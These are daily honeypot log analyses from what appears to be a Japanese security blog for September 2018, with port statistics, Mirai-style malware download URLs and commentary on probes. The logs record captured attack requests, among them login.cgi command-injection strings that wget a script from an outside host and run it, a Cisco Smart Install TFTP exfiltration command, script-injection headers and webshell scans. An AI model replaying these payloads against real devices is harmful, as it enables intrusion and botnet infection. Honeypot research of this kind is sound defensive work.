sec-chick Blog

サイバーセキュリティブログ

ハニーポット簡易分析(40-42日目:9/17-9/19)

9/17-9/19 のHonetyrapにおける簡易分析となります。
9/17までは Ethereumに関する通信が多かったですが、9/18には数が激減しました。
それ以降は特に通信の傾向変化はありませんでした。

◾️4786に関する通信について
 検知数は多くないですが、Cisco Smart Install Client が使用する 4786/tcp ポートに対する攻撃を観測していました。TFTPサーバからコンフィグを読み込んで、設定するような通信と思われます。ただし、xxxの部分はこのサーバのIPであり、IPからの通信があるかの調査行為かもしれません。
ペイロード
copy flash:/config.text tftp://222[.]211[.]78[.]73/xxx.xx.xxx.xxx.conf
 

◾️宛先ポートごとの検知数(80ポートを除く)

9/17 6561件
宛先ポート 件数 割合 サービス
8545 1,811 27.60% Ethereum
445 1,769 26.96% SMB
22 360 5.49% SSH
52869 78 1.19% D-Link, Realtek SDK
1433 70 1.07% Microsoft SQL Server
22022 64 0.98% ?
6379 54 0.82% Redis
3389 49 0.75% RDP
81 38 0.58% GoAhead Web Server 
5555 36 0.55% Android Debug Bridge

 

9/18 4746件
宛先ポート 件数 割合 サービス
445 1,824 38.43% SMB
22 671 14.14% SSH
3389 229 4.83% RDP
1433 74 1.56% Microsoft SQL Server
8080 73 1.54% Proxy
52869 46 0.97% D-Link, Realtek SDK
81 43 0.91% GoAhead Web Server 
636 34 0.72% LDAPS
6379 34 0.72% Redis
7657 33 0.70% ?

 

9/19 3089件
宛先ポート 件数 割合 サービス
445 1,540 49.85% SMB
3389 124 4.01% RDP
81 68 2.20% GoAhead Web Server 
22022 64 2.07% ?
1433 50 1.62% Microsoft SQL Server
52869 47 1.52% D-Link, Realtek SDK
8080 46 1.49% Proxy
6379 38 1.23% Redis
6666 36 1.17% IRC
137 32 1.04% NetBIOS Name Service

 

◾️マルウェアダウンロード
こちらは特に傾向の変化はありませんでした。

マルウェアURL 宛先ポート 件数 VT
hxxp://104[.]248[.]176[.]11/sora[.]mips 52869 4 https://www.virustotal.com/#/url/af74305b9f2f5f0fd8aa96f1c9a0dc9158136a4ba3161aea5f5caf69584e99a1/detection
hxxp://107[.]161[.]31[.]20/tenshimips 52869 20 https://www.virustotal.com/#/file/6222453c1c8e5c19425a6b75519210eae830e36ebcccc0d5882b9c14944593f3/detection
hxxp://107[.]191[.]99[.]230/elf[.]mips 52869 29 https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection
hxxp://107[.]191[.]99[.]41/elf[.]mips 52869 49 https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
hxxp://146[.]185[.]253[.]127/keiji[.]mips 52869 4 https://www.virustotal.com/#/file/708f5e3b9c7e0b91f116b7c15c7f6f0a11499867afc2843ff4b890feae8e750a/detection
hxxp://176[.]32[.]33[.]165/mips 8081 1 https://www.virustotal.com/#/file/2a5336e77002a6ebbaa51206cb7a1142463b80bd1299b5a6635c1d3bd1533711/detection
hxxp://185[.]10[.]68[.]127/rtbin 52869 2 https://www.virustotal.com/ja/url/88391b0b3f2a711655750313557dc9cc13d2aa78a8741d5f395453164be5d7c4/analysis/
hxxp://188[.]209[.]52[.]142/c 5555 64 https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
hxxp://207[.]148[.]78[.]152/bc 5555 3 https://www.virustotal.com/ja/url/c98d33aea5b9d6bbfc6db731d38ebdb16dfbaf65cb1896a628a0683f94b2b178/analysis/
hxxp://27[.]102[.]115[.]44/adbs2 5555 3 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
hxxp://74[.]91[.]126[.]105/loli[.]lol[.]mips 52869 1 https://www.virustotal.com/#/url/8cc93d7feb2ed36620aa8c93d0cb4b548f00dde4c9dfddbb5c0790334e53f33b/detection
hxxp://77[.]87[.]77[.]250/izuku[.]mips 8081 1 https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/
hxxp://80[.]211[.]106[.]251/mips 8081 4 https://www.virustotal.com/#/url/4869115c28db63cac236e2096511888609e4876831fbf67c229255157d7beffe/detection
hxxp://80[.]211[.]112[.]150/mips 52869 1 https://www.virustotal.com/ja/file/23a576856c353a434f8edf1d42c3c46beb48e8d39931043847ed193377decafe/analysis/1535606167/
hxxp://80[.]211[.]67[.]245/mips 52869 2 https://www.virustotal.com/#/file/0e344513a62220fcfe0ffebf9b722980eb74a155ff2c86e109311f7e3fe7375c/detection

以上、簡易分析となります。

ハニーポット簡易分析(39日目:9/16)

ハニーポット(Honeytrap)簡易分析の9/16日分となります。

<宛先ポート別TOP10>

9月16日:8594件    
宛先ポート 件数 割合 サービス
8545 2,905 33.80% Ethereum
1433 2,165 25.19% Microsoft SQL Server
445 1,580 18.39% SMB
22 88 1.02% SSH
3390 73 0.85% ?
3389 58 0.68% RDP
52869 38 0.44% D-Link, Realtek SDK
81 34 0.40% GoAhead Web Server 
465 33 0.38% SMTPS
2455 32 0.37% wago-io-system

◾️Microsoft SQL Serverへのアクセス
パッと、ペイロードを確認する限りは特に攻撃と思われる文字列はありませんでした。BOFなどであった場合、デコードしても特に意味はないと思うので、ここらの検知をどうするかは課題の一つだと考えています。IDSをちゃんと検知できるようにチューニングしなければ。。。。。

HEX表記:
1201002900000000000015000601001b000102001c000103001d0004ff0800015500000000f00b0000
デコード後:
...)............................U........


<マルウェアダウンロード>

マルウェアURL 件数 VT
hxxp://107[.]191[.]99[.]41/elf[.]mips 19 https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
hxxp://188[.]209[.]52[.]142/c 15 https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
hxxp://146[.]185[.]253[.]127/keiji[.]mips 9 https://www.virustotal.com/#/file/708f5e3b9c7e0b91f116b7c15c7f6f0a11499867afc2843ff4b890feae8e750a/detection
hxxp://74[.]91[.]126[.]105/loli[.]lol[.]mips 4 https://www.virustotal.com/#/url/8cc93d7feb2ed36620aa8c93d0cb4b548f00dde4c9dfddbb5c0790334e53f33b/detection
hxxp://80[.]211[.]106[.]251/mips 4 https://www.virustotal.com/#/url/4869115c28db63cac236e2096511888609e4876831fbf67c229255157d7beffe/detection
hxxp://27[.]102[.]115[.]44/adbs2 2 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
hxxp://77[.]87[.]77[.]250/izuku[.]mips 1 https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/

マルウェアは新規で検知したものはありませんでした。

以上、簡易分析となります。

ハニーポット簡易分析(34-38日目:9/11-9/15)

ちょっと感覚が空いてしまいましたが、Honeytrapの簡易分析した結果を記載します。

 9月11日〜9月15日のHoneytrapのログ

9月11日:10073件
宛先ポート 件数 割合 サービス
8545 2,907 28.86% Ethereum
445 1,996 19.82% SMB
22 1,047 10.39% SSH
5739 130 1.29% ?
81 81 0.80% GoAhead Web Server 
1433 62 0.62% Microsoft SQL Server
52869 51 0.51% D-Link, Realtek SDK
3389 46 0.46% RDP
8080 46 0.46% PROXY
129 32 0.32% Password Generator Protocol

 

9月12日:8480件
宛先ポート 件数 割合 サービス
8545 2,900 34.20% Ethereum
445 1,991 23.48% SMB
3389 105 1.24% RDP
52869 85 1.00% D-Link, Realtek SDK
1433 61 0.72% Microsoft SQL Server
81 45 0.53% GoAhead Web Server 
82 33 0.39% ?
111 33 0.39% ONC RPC (Sun RPC)
4222 32 0.38% Multi User Systems
8080 32 0.38% PROXY

 

9月13日:7524件
宛先ポート 件数 割合 サービス
8545 2,903 38.58% Ethereum
445 1,941 25.80% SMB
22 311 4.13% SSH
52869 86 1.14% D-Link, Realtek SDK
1433 50 0.66% Microsoft SQL Server
81 50 0.66% GoAhead Web Server 
3389 41 0.55% RDP
27017 34 0.45% MongoDB
7777 34 0.45% ?
6000 33 0.44% IRC

 

9月14日:6516件
宛先ポート 件数 割合 サービス
8545 2,904 44.57% Ethereum
445 1,873 28.75% SMB
443 83 1.27% HTTPS
3389 62 0.95% RDP
81 55 0.84% GoAhead Web Server 
1433 52 0.80% Microsoft SQL Server
52869 49 0.75% D-Link, Realtek SDK
1434 33 0.51% Microsoft SQL Server
2252 33 0.51% NJENET using SSL
2376 33 0.51% ?

 

9月15日:6404件
宛先ポート 件数 割合 サービス
8545 2,904 45.35% Ethereum
445 1,691 26.41% SMB
22 98 1.53% SSH
789 64 1.00% ?
1433 59 0.92% Microsoft SQL Server
81 43 0.67% GoAhead Web Server 
3389 41 0.64% RDP
8080 40 0.63% PROXY
5555 29 0.45% Android Debug Bridge
3388 20 0.31% ?

 

<thereum関連の通信について>
◾️検知数

f:id:one-chick-sec:20180916183320p:plain

◾️送信元IP

送信元IP 件数
46[.]166.148.196 22,448
172[.]105.211.241 26
213[.]202.242.16 26
138[.]197.137.152 24
185[.]10.68.247 16
122[.]228.10.50 1
71[.]6.146.130 1
80[.]82.77.139 1
80[.]82.77.33 1


グラフにまとめてみると、9/7から急激に増加しています。送信元IPは46[.]166.148.196から集中的に検知していました。該当のURLについて、調査して見ましたが特に悪質であるという明確な情報は得られませんでした。

Reputation Lookup - Cisco Talos

ペイロードは以下の内容であり、idの部分のみを変えて送ってきます。毎回同じリクエストを送ってくるので、毎日同じ検知数となっています。


<リクエスト内容>
POST / HTTP/1.1
Host: xxx.xxx.xxx.xxx:8545
User-Agent: Geth/v1.7.3-stable/linux-amd64/go1.9.2
Content-Length: 66 Content-Type: application/json
Accept-Encoding: gzip
Connection: close.

{"jsonrpc":"2.0","method":"eth_accounts","params":[], "id":309722}

ノードが持つアドレスを取得するメソッドを送信しているものですが、送信元が同じであることを考慮すると、調査行為というより、何かしらで設定をミスって自分のハニポのIPへ送信しているのかもしれません。現状はレスポンスを返すような設定を入れていないですが、レスポンスをきちんと返してあげれば、何かしらの反応があるかもしれません。

 

マルウェアのダウンロード傾向>

特に大きく変わっていませんでした。Mirai系のマルウェアが多いですが、厳密にはいくつか種類があるので、ここら辺も一度整理したいと思ってます。

宛先ポート マルウェアダウンロードURL VT
5555 hxxp://185[.]162[.]130[.]187/adbs2 https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/
5555 hxxp://207[.]148[.]78[.]152/bc https://www.virustotal.com/ja/url/c98d33aea5b9d6bbfc6db731d38ebdb16dfbaf65cb1896a628a0683f94b2b178/analysis/
5555 hxxp://27[.]102[.]115[.]44/adbs2 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/1536299216/
8081 hxxp://77[.]87[.]77[.]250/izuku[.]mips https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/
52869 hxxp://107[.]191[.]99[.]41/elf[.]mips https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
52869 hxxp://167[.]88[.]117[.]178/kratos[.]mips https://www.virustotal.com/#/file/f8bda8dd8ce8538cff98edb2cf7ef2a64f4a6b96e9dba1ed41a1bfb212d31851/detection
52869 hxxp://212[.]237[.]32[.]62/mips https://www.virustotal.com/#/file/40e606c1d09c76d4681d3c745bf5dc261559b241c78ed9cb7baa59e6dcbb44ff/detection
52869 hxxp://74[.]91[.]126[.]105/loli[.]lol[.]mips https://www.virustotal.com/#/url/8cc93d7feb2ed36620aa8c93d0cb4b548f00dde4c9dfddbb5c0790334e53f33b/detection
52869 hxxp://80[.]211[.]173[.]159/mips https://www.virustotal.com/ja/file/850ddc81cc1ff8982beb3cc826d85eea80db1aa88872a552600000cf5730c6ed/analysis/1536298848/
52869 hxxp://107[.]191[.]99[.]41/loli[.]lol[.]mips https://www.virustotal.com/#/file/3d57de9c546ae22e688c2aa3c67f1477ed53ff415facb8410d0964b4a7e367c2/detection
52869 hxxp://146[.]185[.]253[.]127/keiji[.]mips https://www.virustotal.com/#/file/708f5e3b9c7e0b91f116b7c15c7f6f0a11499867afc2843ff4b890feae8e750a/detection
8081 hxxp://176[.]32[.]33[.]165/mips https://www.virustotal.com/#/file/2a5336e77002a6ebbaa51206cb7a1142463b80bd1299b5a6635c1d3bd1533711/detection
5555 hxxp://188[.]209[.]52[.]142/c https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
8081 hxxp://80[.]211[.]106[.]251/mips https://www.virustotal.com/#/url/4869115c28db63cac236e2096511888609e4876831fbf67c229255157d7beffe/detection

 

以上、簡易分析となります。

 

ハニーポット簡易分析(31-33日目:9/8-9/10)

なんとか、1ヶ月間分析を継続していけました(だいぶ遅れることはありましたが。。。)。3日分(8/8 - 8/10)のHoneytrapの解析結果となります。
<宛先ポート別検知数>

8月8日:5660件 8月9日:6055件 8月10日:12850件
ポート 件数 割合 サービス ポート 件数 割合 サービス ポート 件数 割合 サービス
8545 2,166 38.27% Ethereum 8545 2,899 47.88% Ethereum 5739 3,278 25.51% ?
445 1,908 33.71% SMB 445 1,782 29.43% SMB 8545 2,905 22.61% Ethereum
3389 84 1.48% RDP 1433 68 1.12% Microsoft SQL Server 445 2,161 16.82% SMB
1433 77 1.36% Microsoft SQL Server 44818 62 1.02% ? 503 160 1.25% intrinsa
6022 64 1.13% X Window System 52869 56 0.93% D-Link, Realtek SDK 22 108 0.84% SSH
52869 61 1.08% D-Link, Realtek SDK 3389 46 0.76% RDP 1433 65 0.51% Microsoft SQL Server
81 38 0.67% GoAhead Web Server  81 41 0.68% GoAhead Web Server  52869 51 0.40% D-Link, Realtek SDK
25 34 0.60% SMTP 5222 34 0.56% ? 3389 41 0.32% RDP
3386 33 0.58% ? 4911 33 0.55% ? 8080 34 0.26% PROXY
8098 32 0.57% ? 79 30 0.50% ? 10000 34 0.26% Webmin

マルウェアダウンロード先>

ポート マルウェアダウンロード先 VT
52869 hxxp://107[.]191[.]99[.]41/elf[.]mips https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
52869 hxxp://138[.]68[.]240[.]213/tenshimips[.]mips https://www.virustotal.com/ja/url/63e8fb14fe791f7d992bb77e73668f6b5487b0a0f0079ede6630cf788c9f3b7b/analysis/1536416627/
52869 hxxp://167[.]99[.]171[.]249/hoho[.]mips https://www.virustotal.com/#/url/8cc93d7feb2ed36620aa8c93d0cb4b548f00dde4c9dfddbb5c0790334e53f33b/detection
52869 hxxp://185[.]10[.]68[.]127/rtbin https://www.virustotal.com/ja/url/88391b0b3f2a711655750313557dc9cc13d2aa78a8741d5f395453164be5d7c4/analysis/
5555 hxxp://207[.]148[.]78[.]152/bc https://www.virustotal.com/ja/url/c98d33aea5b9d6bbfc6db731d38ebdb16dfbaf65cb1896a628a0683f94b2b178/analysis/
5555 hxxp://27[.]102[.]115[.]44/adbs2 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
52869 hxxp://74[.]91[.]126[.]105/loli[.]lol[.]mips https://www.virustotal.com/#/url/494e13da8a115b5766b6e0ba41d2b7eb1b1e2a7fc0b0ad448d4b088c63ae6414/detection
8081 hxxp://77[.]87[.]77[.]250/izuku[.]mips https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/
52869 hxxp://80[.]211[.]173[.]159/mips https://www.virustotal.com/#/file/850ddc81cc1ff8982beb3cc826d85eea80db1aa88872a552600000cf5730c6ed/detection

→特に変化なし

◾️ポート 8545 の通信
<リクエスト>
POST / HTTP/1.1
Host: XXX.XX.XXX.XXX:8545
User-Agent: Geth/v1.7.3-stable/linux-md64/go1.9.2

{"jsonrpc":"2.0","method":"eth_accounts","params":[], "id":476}


<内容>
Ethereumノードへの調査活動となります。以下のサイトでも同様な攻撃を検知しており、解説してくれています。

Ethereumノードへの調査活動 - おふとん

ここ数日で急激に増加しているので、攻撃の前兆かもしれないので注視したいと思います。


◾️ポート 5739の通信
<リクエスト>
...+&......Cookie: mstshash=hello..........

<内容>
RDPに接続可能であるかの調査行為となります。RDPに接続する際、Cookie に mstshash とユーザー名をセットして通信を行う仕組みです。今回は hello のユーザー名で入れるかの調査行為ですが、通常であればログインできないと思います。ポート5739でRDPを使っているような記事は見られなかったので、攻撃者の意図が気になります。

------------

ここ数日で検知数が増加したポート番号が出てきましたので、これらのポートは注視していきたいと思います。
今回の簡易分析は以上となります。

ハニーポット簡易分析(30日目:9/7)

9/7の簡易分析となります。Honeytrapの傾向は特に変化はありませんでした。

 

Honeytrap
検知数:3576件(データ部 0byte以上)
<宛先ごとにおける検知数>

ポート 件数 割合 サービス
445 1,944 54.50% SMB
3389 73 2.05% RDP
1433 69 1.93% Microsoft SQL Server
102 67 1.88% ?
52869 62 1.74% D-Link, Realtek SDK
81 46 1.29% GoAhead Web Server 
123 34 0.95% NTP
22 34 0.95% SSH
49 32 0.90% TACACS+ Login Host protocol
8080 32 0.90% PROXY


マルウェアダウンロード別

宛先ポート

マルウェアダウンロード先 件数 VT
5555 hxxp://185[.]162[.]130[.]187/adbs2 1 https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/
5555 hxxp://27[.]102[.]115[.]44/adbs2 2 https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
8081 hxxp://77[.]87[.]77[.]250/izuku[.]mips 16 https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/
52869 hxxp://107[.]191[.]99[.]41/elf[.]mips 18 https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/
52869 hxxp://138[.]68[.]240[.]213/tenshimips[.]mips 5 https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/
52869 hxxp://80[.]211[.]112[.]150/mips 1 https://www.virustotal.com/ja/file/23a576856c353a434f8edf1d42c3c46beb48e8d39931043847ed193377decafe/analysis/1535606167/


WoWhoneypot
検知パス

Method パス
GET /
GET /admin/assets/js/views/login.js
GET /login.cgi?cli=aa%20aa%27;wget -省略-
GET /pma/scripts/setup.php
GET @research.aegis[.]network/
GET hxxp://112.35.53[.]83:10083/index.php
OPTIONS /ipc$

マルウェアダウンロード:
hxxp://77.87.77[.]250/izuku[.]sh

@research.aegis[.]network/ 宛の通信内容は以下となります。

GET @research.aegis[.]network/ HTTP/1.0
User-Agent: <script src="//research[.]aegis[.]network/test.js"></script>Referer: <script src="//research[.]aegis[.]network/test.js"></script>

該当するサイトへアクセスしてみると、Aegisという会社が行なっている調査が行なっている通信と推測されます。一応、該当するIPで/block のパスにアクセスすれば収集を止めてくれると書いてありますが、止め方が現実的ではないですね。企業のサーバであれば、サーバからアクセスもFWなどで制御しているはずなので。

f:id:one-chick-sec:20180909013727p:plain

該当する企業のサイトへアクセスしてみましたが、以下の表示だけであり、詳細な情報は記載されていませんでした。

f:id:one-chick-sec:20180909013212p:plain


以上、簡易分析となります。

ハニーポット簡易分析(26-29日目:9/2-9/6)

更新が滞ってしまいましたが、ここ数日分の簡易分析を書きたいと思います。

 

1.Honeytrap

<宛先ごとにおける検知数>             

日付:9/3 件数:3801件 日付:9/4 件数:4699件
宛先ポート 件数 割合 宛先ポート 件数 割合
445 1,894 49.83% 445 2,235 45.01%
3389 78 2.05% 1433 77 1.55%
52869 65 1.71% 5006 64 1.29%
1433 58 1.53% 37777 60 1.21%
81 42 1.11% 52869 51 1.03%
8080 36 0.95% 8080 50 1.01%
9944 33 0.87% 3389 37 0.75%
8088 17 0.45% 25 33 0.66%
8564 15 0.40% 771 32 0.64%
5555 14 0.37% 5555 30 0.60%
日付:9/5 件数:5399件 日付:9/6 件数:3971件
宛先ポート 件数 割合 宛先ポート 件数 割合
445 2,073 38.40% 445 2,115 53.26%
2022 475 8.80% 3389 76 1.91%
6022 64 1.19% 1433 72 1.81%
3389 61 1.13% 10001 64 1.61%
1433 60 1.11% 81 51 1.28%
81 53 0.98% 52869 48 1.21%
52869 48 0.89% 4899 39 0.98%
25 37 0.69% 587 34 0.86%
8080 33 0.61% 8080 33 0.83%
8069 32 0.59% 4443 32 0.81%

 

日付 マルウェアダウンロード先 検知数
9月3日 hxxp://107[.]191[.]99[.]41/elf[.]mips 30
9月3日 hxxp://138[.]68[.]21[.]15/oxy[.]mips 2
9月3日 hxxp://185[.]10[.]68[.]127/rtbin 4
9月3日 hxxp://207[.]148[.]78[.]152/bc 4
9月3日 hxxp://27[.]102[.]115[.]44/adbs2 9
9月3日 hxxp://77[.]87[.]77[.]250/izuku[.]mips 14
9月3日 hxxp://95[.]215[.]62[.]169/adbs 1
9月4日 hxxp://107[.]191[.]99[.]41/elf[.]mips 9
9月4日 hxxp://138[.]68[.]21[.]15/tenshimips[.]mips 11
9月4日 hxxp://148[.]72[.]176[.]78/ngynx 1
9月4日 hxxp://176[.]32[.]33[.]171/kenjiro[.]mips 1
9月4日 hxxp://77[.]87[.]77[.]250/izuku[.]mips 11
9月4日 hxxp://80[.]211[.]112[.]150/mips 1
9月4日 hxxp://80[.]211[.]173[.]159/mips 2
9月5日 hxxp://107[.]191[.]99[.]41/elf[.]mips 11
9月5日 hxxp://138[.]68[.]21[.]15/tenshimips[.]mips 24
9月5日 hxxp://148[.]72[.]176[.]78/ngynx 1
9月5日 hxxp://27[.]102[.]115[.]44/adbs2 2
9月5日 hxxp://77[.]246[.]157[.]180/c 1
9月5日 hxxp://77[.]87[.]77[.]250/izuku[.]mips 7
9月6日 hxxp://107[.]191[.]99[.]41/elf[.]mips 12
9月6日 hxxp://138[.]68[.]21[.]15/tenshimips[.]mips 5
9月6日 hxxp://185[.]62[.]189[.]149/adbs2 2
9月6日 hxxp://207[.]148[.]78[.]152/bc 1
9月6日 hxxp://27[.]102[.]115[.]44/adbs2 4
9月6日 hxxp://77[.]87[.]77[.]250/izuku[.]mips 14


変わらず、IoT系のマルウェアが多いですね。ちょくちょく、パス部分は変わっているので中身が少し変化しているかもしれません。


2.WoWHoneypot

@research.aegis.networkのパスに対して、アクセスが来てました。内容は調査行為でした。
WoWHoneypot マルウェアダウンロード先

http://148.72.176.78/ken.sh
http://77.87.77.250/izuku.sh
http://80.211.112.150/k
http://148.72.176.78/ngynx
http://77.73.69.246/dl

 

 WoWHoneypot 検知パス

日付 メソッド URLパス
9月3日 CONNECT cn.bing[.]com:443
9月3日 CONNECT www.baidu[.]com:443
9月3日 GET /
9月3日 GET /MyAdmin/scripts/setup.php
9月3日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月3日 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
9月3日 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
9月3日 GET /manager/html
9月3日 GET /phpMyAdmin/scripts/setup.php
9月3日 GET /pma/scripts/setup.php
9月3日 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
9月3日 GET /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr
9月3日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月3日 GET hxxp://www.ip.cn/
9月3日 OPTIONS /C$
9月3日 PROPFIND /C$
9月3日 PROPFIND /Users
9月4日 GET /
9月4日 GET /HNAP1/
9月4日 GET /_query.php
9月4日 GET /appserv.php
9月4日 GET /ccvv
9月4日 GET /cmd.php
9月4日 GET /cmdd.php
9月4日 GET /cmv.php
9月4日 GET /cmx.php
9月4日 GET /db_cts.php
9月4日 GET /db_pma.php
9月4日 GET /desktop.ini.php
9月4日 GET /hell.php
9月4日 GET /help-e.php
9月4日 GET /help.php
9月4日 GET /java.php
9月4日 GET /knal.php
9月4日 GET /lala-dpr.php
9月4日 GET /lala.php
9月4日 GET /license.php
9月4日 GET /log.php
9月4日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月4日 GET /logon.php
9月4日 GET /lol.php
9月4日 GET /muhstik-dpr.php
9月4日 GET /muhstik.php
9月4日 GET /muhstik2.php
9月4日 GET /muhstiks.php
9月4日 GET /pmd_online.php
9月4日 GET /shell.php
9月4日 GET /test.php
9月4日 GET /text.php
9月4日 GET /uploader.php
9月4日 GET /webdav/
9月4日 GET /wp-config.php
9月4日 GET /wpo.php
9月4日 GET /x.php
9月4日 GET /z.php
9月4日 POST /12.php
9月4日 POST /1213.php
9月4日 POST /3.php
9月4日 POST /56.php
9月4日 POST /9510.php
9月4日 POST /9678.php
9月4日 POST /aaaa.php
9月4日 POST /ak.php
9月4日 POST /ak47.php
9月4日 POST /ak48.php
9月4日 POST /angge.php
9月4日 POST /aotu.php
9月4日 POST /app.php
9月4日 POST /aw.php
9月4日 POST /bak.php
9月4日 POST /cainiao.php
9月4日 POST /ceshi.php
9月4日 POST /cmd.php
9月4日 POST /conflg.php
9月4日 POST /data.php
9月4日 POST /db__.init.php
9月4日 POST /db_dataml.php
9月4日 POST /db_desql.php
9月4日 POST /db_session.init.php
9月4日 POST /default.php
9月4日 POST /defect.php
9月4日 POST /fack.php
9月4日 POST /feixiang.php
9月4日 POST /h1.php
9月4日 POST /help.php
9月4日 POST /hh.php
9月4日 POST /hm.php
9月4日 POST /infoo.php
9月4日 POST /ip.php
9月4日 POST /l7.php
9月4日 POST /l8.php
9月4日 POST /lindex.php
9月4日 POST /linuxse.php
9月4日 POST /log.php
9月4日 POST /m.php?pbid=open
9月4日 POST /min.php
9月4日 POST /mx.php
9月4日 POST /mz.php
9月4日 POST /pe.php
9月4日 POST /phpStudy.php
9月4日 POST /phpinfi.php
9月4日 POST /post.php
9月4日 POST /python.php
9月4日 POST /q.php
9月4日 POST /qaq.php
9月4日 POST /qq.php
9月4日 POST /qwe.php
9月4日 POST /s.php
9月4日 POST /sean.php
9月4日 POST /sheep.php
9月4日 POST /ssaa.php
9月4日 POST /system.php
9月4日 POST /test.php
9月4日 POST /tiandi.php
9月4日 POST /w.php
9月4日 POST /wan.php
9月4日 POST /wanan.php
9月4日 POST /wc.php
9月4日 POST /webslee.php
9月4日 POST /weixiao.php
9月4日 POST /wp-admins.php
9月4日 POST /wshell.php
9月4日 POST /wuwu11.php
9月4日 POST /xiao.php
9月4日 POST /xiaoma.php
9月4日 POST /xiaomae.php
9月4日 POST /xiaomar.php
9月4日 POST /xshell.php
9月4日 POST /xw.php
9月4日 POST /xw1.php
9月4日 POST /xx.php
9月4日 POST /xz.php
9月4日 POST /yao.php
9月4日 POST /yumo.php
9月4日 POST /zshmindex.php
9月4日 POST /zuo.php
9月4日 POST /zuoindex.php
9月4日 POST /zuoshou.php
9月4日 PROPFIND /
9月5日 GET /
9月5日 GET /_query.php
9月5日 GET /admin/assets/js/views/login.js
9月5日 GET /appserv.php
9月5日 GET /cmd.php
9月5日 GET /cmdd.php
9月5日 GET /cmv.php
9月5日 GET /cmx.php
9月5日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日 GET /cmx.php?cmd=ec+A:C+D6
9月5日 GET /db_cts.php
9月5日 GET /db_pma.php
9月5日 GET /desktop.ini.php
9月5日 GET /hell.php
9月5日 GET /help-e.php
9月5日 GET /help.php
9月5日 GET /java.php
9月5日 GET /knal.php
9月5日 GET /lala-dpr.php
9月5日 GET /lala.php
9月5日 GET /license.php
9月5日 GET /log.php
9月5日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日 GET /login.cgi?cli=aa%20aa%27;wget 〜省略〜
9月5日 GET /logon.php
9月5日 GET /lol.php
9月5日 GET /muhstik-dpr.php
9月5日 GET /muhstik.php
9月5日 GET /muhstik2.php
9月5日 GET /muhstiks.php
9月5日 GET /pmd_online.php
9月5日 GET /shell.php
9月5日 GET /test.php
9月5日 GET /text.php
9月5日 GET /uploader.php
9月5日 GET /webdav/
9月5日 GET /wp-config.php
9月5日 GET /wpo.php
9月5日 GET /x.php
9月5日 GET /z.php
9月5日 POST /12.php
9月5日 POST /1213.php
9月5日 POST /3.php
9月5日 POST /56.php
9月5日 POST /9510.php
9月5日 POST /9678.php
9月5日 POST /aaaa.php
9月5日 POST /ak.php
9月5日 POST /ak47.php
9月5日 POST /ak48.php
9月5日 POST /angge.php
9月5日 POST /aotu.php
9月5日 POST /app.php
9月5日 POST /aw.php
9月5日 POST /bak.php
9月5日 POST /cainiao.php
9月5日 POST /ceshi.php
9月5日 POST /cmd.php
9月5日 POST /cmx.php
9月5日 POST /conflg.php
9月5日 POST /data.php
9月5日 POST /db.init.php
9月5日 POST /db__.init.php
9月5日 POST /db_dataml.php
